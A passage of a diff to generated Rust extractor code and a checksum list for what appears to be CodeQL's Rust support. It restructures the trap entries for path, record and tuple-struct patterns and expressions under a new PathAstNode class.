trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Expr - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct RecordFieldList { pub id: trap::TrapId, 
@@ -6639,78 +6535,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct RecordPat { - pub id: trap::TrapId, - pub path: Option>, - pub record_pat_field_list: Option>, -} - -impl trap::TrapEntry for RecordPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("record_pats", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("record_pat_paths", vec![id.into(), v.into()]); - } - if let Some(v) = self.record_pat_field_list { - out.add_tuple("record_pat_record_pat_field_lists", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for RecordPat { - fn class_name() -> &'static str { "RecordPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct RefExpr { pub id: trap::TrapId, 
@@ -7475,78 +7299,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct TupleStructPat { - pub id: trap::TrapId, - pub fields: Vec>, - pub path: Option>, -} - -impl trap::TrapEntry for TupleStructPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("tuple_struct_pats", vec![id.into()]); - for (i, v) in self.fields.into_iter().enumerate() { - out.add_tuple("tuple_struct_pat_fields", vec![id.into(), i.into(), v.into()]); - } - if let Some(v) = self.path { - out.add_tuple("tuple_struct_pat_paths", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for TupleStructPat { - fn class_name() -> &'static str { "TupleStructPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct TupleType { pub id: trap::TrapId, 
@@ -9411,8 +9163,8 @@ impl From> for trap::Label { #[derive(Debug)] pub struct PathExpr { pub id: trap::TrapId, - pub attrs: Vec>, pub path: Option>, + pub attrs: Vec>, } impl trap::TrapEntry for PathExpr { @@ -9422,12 +9174,12 @@ impl trap::TrapEntry for PathExpr { fn emit(self, id: trap::Label, out: &mut trap::Writer) { out.add_tuple("path_exprs", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } for (i, v) in self.attrs.into_iter().enumerate() { out.add_tuple("path_expr_attrs", vec![id.into(), i.into(), v.into()]); } - if let Some(v) = self.path { - out.add_tuple("path_expr_paths", vec![id.into(), v.into()]); - } } } @@ -9471,6 +9223,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + impl From> for trap::Label { fn from(value: trap::Label) -> Self { // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of PathExprBase 
@@ -9489,6 +9250,245 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct PathPat { + pub id: trap::TrapId, + pub path: Option>, +} + +impl trap::TrapEntry for PathPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("path_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for PathPat { + fn class_name() -> &'static str { "PathPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +#[derive(Debug)] +pub struct RecordExpr { + pub id: trap::TrapId, + pub path: Option>, + 
pub record_expr_field_list: Option>, +} + +impl trap::TrapEntry for RecordExpr { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("record_exprs", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + if let Some(v) = self.record_expr_field_list { + out.add_tuple("record_expr_record_expr_field_lists", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for RecordExpr { + fn class_name() -> &'static str { "RecordExpr" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Expr + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +#[derive(Debug)] +pub struct 
RecordPat { + pub id: trap::TrapId, + pub path: Option>, + pub record_pat_field_list: Option>, +} + +impl trap::TrapEntry for RecordPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("record_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + if let Some(v) = self.record_pat_field_list { + out.add_tuple("record_pat_record_pat_field_lists", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for RecordPat { + fn class_name() -> &'static str { "RecordPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) 
+ } + } +} + #[derive(Debug)] pub struct Static { pub id: trap::TrapId, 
@@ -9902,6 +9902,87 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct TupleStructPat { + pub id: trap::TrapId, + pub path: Option>, + pub fields: Vec>, +} + +impl trap::TrapEntry for TupleStructPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("tuple_struct_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + for (i, v) in self.fields.into_iter().enumerate() { + out.add_tuple("tuple_struct_pat_fields", vec![id.into(), i.into(), v.into()]); + } + } +} + +impl trap::TrapClass for TupleStructPat { + fn class_name() -> &'static str { "TupleStructPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: 
this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct TypeAlias { pub id: trap::TrapId, diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index dff9541b449..b5427026044 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -1,4 +1,4 @@ -lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll a8e083c7d8c4dea6459c5e128e2123f5cf8fd14c076f2256ebda508c13d553cd 16fcc0d34097b0b37a0041281515ca028d2702eec6d9c1d03c39a1158883bdef +lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll 7411cdfc2c93ad1e70afd41edb6ba098e2bc9db77213850936a48d07b9f716c4 f2dd71fd4fd8a98681f1d931d04b28a01d6eb3987ab56aa4425e2c57316c81f6 lib/codeql/rust/elements/Abi.qll 4c973d28b6d628f5959d1f1cc793704572fd0acaae9a97dfce82ff9d73f73476 250f68350180af080f904cd34cb2af481c5c688dc93edf7365fd0ae99855e893 lib/codeql/rust/elements/Addressable.qll 13011bfd2e1556694c3d440cc34af8527da4df49ad92b62f2939d3699ff2cea5 ddb25935f7553a1a384b1abe2e4b4fa90ab50b952dadec32fd867afcb054f4be lib/codeql/rust/elements/ArgList.qll 661f5100f5d3ef8351452d9058b663a2a5c720eea8cf11bedd628969741486a2 28e424aac01a90fb58cd6f9f83c7e4cf379eea39e636bc0ba07efc818be71c71 
@@ -102,28 +102,29 @@ lib/codeql/rust/elements/ParenPat.qll 40d033de6c85ad042223e0da80479adebab3549439 lib/codeql/rust/elements/ParenType.qll e1f5695b143c97b98ccdb460a5cf872461cfc13b83a4f005f26c288dc0afae10 1164f8efae7f255925411bddb33939fab0bf1c07955a16fef173b3f4675d09ae lib/codeql/rust/elements/Pat.qll 56211c5cb4709e7c12a2bfd2da5e413a451672d99e23a8386c08ad0b999fd45c b1b1893a13a75c4f0390f7e2a14ee98a46f067cfdc991a8d43adc82497d20aff lib/codeql/rust/elements/Path.qll 16264a9c978a3027f623530e386a9ad16541305b252fed5e1bedcfbe1d6475d5 8c21063c7f344ce686342e7c12542fec05004e364681f7a31b65f5ee9263a46d -lib/codeql/rust/elements/PathExpr.qll 906df1d80c662b79f1b0b0428c39754b7f8dbcb2234919dd45dd8206a099dd36 1d6015afab6378c926c5838c9a5772cfcfeedf474e2eeca3e46085300ff8d4e1 -lib/codeql/rust/elements/PathExprBase.qll db8702a2e2cec7c1daaad38649c27b657759103ca451dfa9d34b9be873fdc0af d770e983fb55e06f3fcee6b7511cf5d4ed4c4f6a18d8b1d1f14553cdbe8666df -lib/codeql/rust/elements/PathPat.qll 9d0b29b964bfe3a90af4c9930868a3d2046d2210a1575f9b9af84f6fd3fccbab 21748a5bd01d5531c846e6b7c1cc9fddf4adc0c959843e668df200a2490a5f94 +lib/codeql/rust/elements/PathAstNode.qll c5c8627caaf863089d4d6004e206b2e62bc466db2ed5da9f3f443bf3dc29faf9 01107b1ce17cbee08a764962fb13d3f02edbd10675fa5bd89e089f03075ba443 +lib/codeql/rust/elements/PathExpr.qll 803309419841293a640e0b2f0bf5b5bcdf00dd46d275797d4bc51c2fe651c944 083cd7768a03ac11a9d892ca190334d465d183f66509613c2e87c52b36c6df7c +lib/codeql/rust/elements/PathExprBase.qll bb41092ec690ae926e3233c215dcaf1fd8e161b8a6955151949f492e02dba13a b2257072f8062d31c29c63ee1311b07e0d2eb37075f582cfc76bb542ef773198 +lib/codeql/rust/elements/PathPat.qll a7069d1dd77ba66814d6c84e135ed2975d7fcf379624079e6a76dc44b5de832e 2294d524b65ab0d038094b2a00f73feb8ab70c8f49fb4d91e9d390073205631d lib/codeql/rust/elements/PathSegment.qll 9560551cf8b65e84705e7f302e12b48330e048613129e87c0f65a7eb297a6cc3 3aa75a5fd81f8ea32bd2b4bf0c51c386de57cbe9ab035fe3ec68ad7fcf51b375 lib/codeql/rust/elements/PathType.qll 
257ede178bb74ebdb8e266ebaa95082e7fb7cc8d921ef476f4df268ee8a1366c c48f6e04a8945a11f965e71819f68c00abc53a055042882b61716feda3ca63ae lib/codeql/rust/elements/PrefixExpr.qll 107e7bd111b637fd6d76026062d54c2780760b965f172ef119c50dd0714a377d 46954a9404e561c51682395729daac3bda5442113f29839d043e9605d63f7f6d lib/codeql/rust/elements/PtrType.qll b137f47a53e41b3b30c7d80dbdd6724bf15f99530ca40cc264a04af5f07aa878 b2ffdf739bfb7564d942fe54409834a59511c0b305b6d5b2219a8ee0ef594332 lib/codeql/rust/elements/RangeExpr.qll 43785bea08a6a537010db1138e68ae92eed7e481744188dfb3bad119425ff740 5e81cfbdf4617372a73d662a248a0b380c1f40988a5daefb7f00057cae10d3d4 lib/codeql/rust/elements/RangePat.qll b5c0cfc84b8a767d58593fa7102dcf4be3ff8b02ba2f5360c384fa8af4aac830 cc28399dd99630bfa50c54e641a3833abe6643137d010a0a25749d1d70e8c911 -lib/codeql/rust/elements/RecordExpr.qll d368aaf18319c0560c04d0438caf64b3b7aad3aa0cf4bbb643bfbb58d6d71091 44323e15b5a6fab187e846abe9cb530c6472ed673993c5e3679279b1286792da +lib/codeql/rust/elements/RecordExpr.qll b8541a33ef408f2070103c1db8b6ec845bc6b1d8c810f5d8d208e5eeb9f86b30 a6d9602a64c9acf48f033f06fe7e1d86382512fd378ee3044f1126726847f696 lib/codeql/rust/elements/RecordExprField.qll edac04146849e2aeca27e7bbb896c21aa2e2b15736b1e8a06ac51ab01433b3ac 7c062bd6d5dd5b1d972450fb0b3272cd9b45f94ccd668c3bd4347e2dce3279ed lib/codeql/rust/elements/RecordExprFieldList.qll 672c3854cb84090c8a2e9311c43448016dc2614ecbf86dbe404156304674e38f 01ae0ffca0bf640c61120e36fcf2c560555f4aabbd49ddce6f5c1a3561dbfc31 lib/codeql/rust/elements/RecordField.qll 9c462033cc889756876cb3d2a07e4f0d9a67064cf188cdd68e08ab21e5edc459 437254bbf6537f1a575ae344c2e23ffad7138776db8f7ebf90026c13886a2638 lib/codeql/rust/elements/RecordFieldList.qll cebab3fba41221e61cda801070a7f414b62b4fbcf2206e35462c0da35ad75c3f db092d47eea871d61541b9711d7139a99394e0ed83901a8ae60f03dfa8ed722f -lib/codeql/rust/elements/RecordPat.qll bb21f25373afd03232f8e2977134b6a10ac525f0bd654bbf95713b964b99ba0f 
28313e566c86d09ae3b60df538a3c7561f73c02b8ac93eaa5ff9914b2c9b241c +lib/codeql/rust/elements/RecordPat.qll 3e31af707f72e9af42142e54b7251da8cbc88a9d5f448a4e6b3ca578f92f5680 0b459d751c26a062608ef0b6f3859e9ed1342e129b004ec218694d011955cfbd lib/codeql/rust/elements/RecordPatField.qll 7487461887e82bcf224b02628dfc64457121ab17e731e2dc7aa7e731ab16c02f f2018e55722245eb4273fb067242aaa503c43f91671a55b3a4bb51fe7bc0a03c lib/codeql/rust/elements/RecordPatFieldList.qll c3198c997f389ce95db377ca40ac69a1448f120093f37ab1c92a5a3f1f6aa0d4 9db36d274f1ec77c442ae7e38f940a65c9a92f1541f66140188b226965851535 lib/codeql/rust/elements/RefExpr.qll 91a0d3a86002289dc01ffbe8daca13e34e92e522fbb508241a9d51faf1d4a9d2 b6e63d8e6f8956d2501706d129a6f5f24b410ea6539839757c76ba950c410582 lib/codeql/rust/elements/RefPat.qll fe076bdccb454111b38f360837d180274ba8a003b4cffe910b5197cd74188089 2604c8bb2b0b47091d5fc4aa276de46fe3561e346bd98f291c3783cef402ba06 lib/codeql/rust/elements/RefType.qll 5dc6012188d5baf36cd7bf0ebc127e28e98862a3f91ea4df2f9b9c962f3a395d ddb06ebe7fb92ad7bbe86cf182270e8494b74edf91b8c841aaf7ba932e5092ac lib/codeql/rust/elements/Rename.qll 55fa06145f2160304caac0a5ce4cf6a496e41adfd66f44b3c0a1d23229ed8ce0 80262f0abf61749cdf0d5701637db359960f5404ad1dbfdd90f5048d2e7c315d -lib/codeql/rust/elements/Resolvable.qll 550d516d55b2c10e6e2afd0b9df7434448405ac8a84c4ded8b56fa1173612d32 0b59f31f411a14dd4eb0fe9df5483e4a00501a480bde6db9e6a499b9c0a57184 +lib/codeql/rust/elements/Resolvable.qll efeec2b4b14d85334ec745b9a0c5aa6f7b9f86fe3caa45b005dccaee4f5265c4 7efe0063340ba61dd31125bc770773ca23a7067893c0d1e06d149da6e9a9ee92 lib/codeql/rust/elements/RestPat.qll a898a2c396f974a52424efbc8168174416ac6ed30f90d57c81646d2c08455794 db635ead3fa236e45bbd9955c714ff0abb1e57e1ce80d99dc5bb13438475adbf lib/codeql/rust/elements/RetType.qll 36ea39240a56c504d94d5487ea9679563eef3dfe0e23bf42d992d1ab2b883518 2fe5b6f62a634c6aa30a1ecd620f3446c167669cf1285c8ef8dd5e5a6ef5fc71 lib/codeql/rust/elements/ReturnExpr.qll 
b87187cff55bc33c8c18558c9b88617179183d1341b322c1cab35ba07167bbdb 892f3a9df2187e745c869e67f33c228ee42754bc9e4f8f4c1718472eb8f8c80f @@ -145,7 +146,7 @@ lib/codeql/rust/elements/TupleExpr.qll 561486554f0c397bc37c87894c56507771174bfb2 lib/codeql/rust/elements/TupleField.qll e58d024fc41519b559eef36cf6081d03a786b05357e4322e7046092131ea508f cad861b23fb4cdf2fbe90595de0e4776f1db9b69c3f3825221e475bc92895351 lib/codeql/rust/elements/TupleFieldList.qll 73397eef1cf8c18286b8f5bb12fbdc9bb75eee3b7bd64d149892952b79e498a3 13ac90f466ab22e5750af9e44aff9605b9e16f8350b4eaecff6a99e83d154e25 lib/codeql/rust/elements/TuplePat.qll 028cdea43868b0fdd2fc4c31ff25b6bbb40813e8aaccf72186051a280db7632e 38c56187971671e6a9dd0c6ccccb2ee4470aa82852110c6b89884496eb4abc64 -lib/codeql/rust/elements/TupleStructPat.qll 743022ff471131aa58cd8ff131eef1568400da0ddefa5dbab1609a7ce00797d7 c6ddf777c3ee3a0f4d55c42f3af6a01e190a1e8892237c6e85c9ae65c84e39f3 +lib/codeql/rust/elements/TupleStructPat.qll da398a23eb616bf7dd586b2a87f4ab00f28623418f081cd7b1cc3de497ef1819 6573bf3f8501c30af3aeb23d96db9f5bea7ab73e2b7ef3473095c03e96c20a5c lib/codeql/rust/elements/TupleType.qll b5c798f7c9b08c8a6cc0a57fc5c36d714e70d5e955a9e87b6b309c18365d7596 ebea533ab126392344d080da1bc9efabcabb5397e93c9d213ffc71a61bb8d47c lib/codeql/rust/elements/TypeAlias.qll 64780697f5869266345d040fdaee05c62b8670b9b5c6369692f9a9dc646986fc afcc7617d0e2e16d92d2a53c3e6661fd184bf5cf21b154f121dbf4d3b7ab30e6 lib/codeql/rust/elements/TypeArg.qll 39aea9a9f0b74e8b90e957dbc3ce593cbdb1d2e0d9320428ce2e9cbfcb772e53 f1f2612633de9f534faf76c368b6154a8dc20feb9297262fcb10a8f192aa2e02 
@@ -301,6 +302,7 @@ lib/codeql/rust/elements/internal/ParenExprConstructor.qll 104b67dc3fd53ab52e2a4 lib/codeql/rust/elements/internal/ParenPatConstructor.qll 9aea3c3b677755177d85c63e20234c234f530a16db20ab699de05ca3f1b59787 29f24aed0d880629a53b30550467ade09a0a778dbf88891769c1e11b0b239f98 lib/codeql/rust/elements/internal/ParenTypeConstructor.qll d62e656a4a3c8ffd4eb87d49585a7a3bfb5dbe3826fbcbd11cb87b46f34c19ae febf6535965afa0f6eac4d2b08730f5a07bbb36a7434abe0a7663d7264961a3f lib/codeql/rust/elements/internal/PatImpl.qll 37c9b1da7aa625117644e2cd74ec0b174f69a38cf66926add01786a05d5ad2ad 143685a0b4873fa0b73b204285dca956e59b32d527bfac6cc336326d244994b7 +lib/codeql/rust/elements/internal/PathAstNodeImpl.qll 5a38c42a9127fc2071a9e8f0914996d8c3763e2708805de922e42771de50f649 ebe319cce565497071118cd4c291668bbcdf5fc8942c07efc5a10181b4ce5880 lib/codeql/rust/elements/internal/PathConstructor.qll 5c6354c28faf9f28f3efee8e19bdb82773adcf4b0c1a38788b06af25bcb6bc4a 3e2aeef7b6b9cda7f7f45a6c8119c98803aa644cf6a492cf0fce318eba40fe8f lib/codeql/rust/elements/internal/PathExprBaseImpl.qll e8b09447ee41b4123f7d94c6b366b2602d8022c9644f1088c670c7794307ab2e 96b9b328771aaf19ba18d0591e85fcc915c0f930b2479b433de3bfdd2ea25249 lib/codeql/rust/elements/internal/PathExprConstructor.qll cf6e0a338a8ed2d1042bdee4c2c49be5827e8c572d8c56e828db265d39e59ae3 36a3d1b7c5cc2cf527616be787b32071b9e2a6613a4f6b3f82e2a3b0e02a516f 
@@ -511,12 +513,13 @@ lib/codeql/rust/elements/internal/generated/ParamList.qll c808c9d84dd7800573832b lib/codeql/rust/elements/internal/generated/ParenExpr.qll bc0731505bfe88516205ec360582a4222d2681d11342c93e15258590ddee82f2 d4bd6e0c80cf1d63746c88d4bcb3a01d4c75732e5da09e3ebd9437ced227fb60 lib/codeql/rust/elements/internal/generated/ParenPat.qll ce24b8f8ecbf0f204af200317405724063887257460c80cf250c39b2fdf37185 e7c87d37e1a0ca7ea03840017e1aa9ddb7f927f1f3b6396c0305b46aeee33db6 lib/codeql/rust/elements/internal/generated/ParenType.qll 9cc954d73f8330dcac7b475f97748b63af5c8766dee9d2f2872c0a7e4c903537 c07534c8a9c683c4a9b11d490095647e420de0a0bfc23273eaf6f31b00244273 -lib/codeql/rust/elements/internal/generated/ParentChild.qll 03c1d8e0c0d0f7e34164f6ede37bdc744790fa25b252b5b34b006c48735daef6 7675198b227e5cb357cabe6a7622f461103e3829c0135560b37013c2a914edb2 +lib/codeql/rust/elements/internal/generated/ParentChild.qll db8cf5d75d53414409fbe1c85865238a026164ea8225736f62de30f334079e1c d0d5bab0287122d754dcb50e6473d178405ba3e4d8e78a82764cbecf5cc6593c lib/codeql/rust/elements/internal/generated/Pat.qll 3605ac062be2f294ee73336e9669027b8b655f4ad55660e1eab35266275154ee 7f9400db2884d336dd1d21df2a8093759c2a110be9bf6482ce8e80ae0fd74ed4 lib/codeql/rust/elements/internal/generated/Path.qll bf6a86e7fcb7164624cc070dcce86d2bda50a2516b95115b87d0ebb5596e50a1 fd7a9ad4034cdebe8dfe495619c46f464630d38195313072e0bd904061b0fb00 -lib/codeql/rust/elements/internal/generated/PathExpr.qll 2096e3c1db22ee488a761690adabfc9cfdea501c99f7c5d96c0019cb113fc506 54245ce0449c4e263173213df01e079d5168a758503a5dbd61b25ad35a311140 -lib/codeql/rust/elements/internal/generated/PathExprBase.qll 696f580d56804c000983cd839671f0d0d573a9d3dbb151f500e4fe3bf900320b ebae99d1541e0d4e519599b2c5e4d734c20b7ed7ba1dbe1772f59ad7bb2c9f0f -lib/codeql/rust/elements/internal/generated/PathPat.qll 551864a9ba7d60b5662044578f0e12e6995c71710d75d8955eec2d7ab52e4d44 fedd7249e7f00229aa8632154fce2c6f1a37e017f9d4d53a5d309ba40e0c22a5 
+lib/codeql/rust/elements/internal/generated/PathAstNode.qll e6d4d5bffd3c623baaaee46bc183eb31ce88795535f164f6a9b9b4d98bbd6101 168db515404933479ba6b150c72e012d28592cbc32366aefcb1bf9599dbcd183 +lib/codeql/rust/elements/internal/generated/PathExpr.qll 3c807f3b01ed24032d7d0e7a3a014452652945f86feeec963a31615084ad5721 3e5e2ea10cadb48c97aaf0fab756563c19039dcc7ec072e886ee5c7b5b06655d +lib/codeql/rust/elements/internal/generated/PathExprBase.qll d8218e201b8557fa6d9ca2c30b764e5ad9a04a2e4fb695cc7219bbd7636a6ac2 4ef178426d7095a156f4f8c459b4d16f63abc64336cb50a6cf883a5f7ee09113 +lib/codeql/rust/elements/internal/generated/PathPat.qll 003d10a4d18681da67c7b20fcb16b15047cf9cc4b1723e7674ef74e40589cc5a 955e66f6d317ca5562ad1b5b13e1cd230c29e2538b8e86f072795b0fdd8a1c66 lib/codeql/rust/elements/internal/generated/PathSegment.qll 0fa07886deb0fc4d909d7edf691238a344f2739900aafb168cbac171eb1729a8 8f4bb418d8bea5e40128a87977c57d0a9183d06d111601ad93130c8615c11465 lib/codeql/rust/elements/internal/generated/PathType.qll df6fd322ba0d99d6cb315edce8dbf099b661b84fdfcc3ad629fdd1fd066c1986 e11c8615cd7b02034b47b58f30a7b6fcbc6d33ec53303288dfd34d9a25f5a186 lib/codeql/rust/elements/internal/generated/PrefixExpr.qll c9ede5f2deb7b41bc8240969e8554f645057018fe96e7e9ad9c2924c8b14722b 5ae2e3c3dc8fa73e7026ef6534185afa6b0b5051804435d8b741dd3640c864e1 
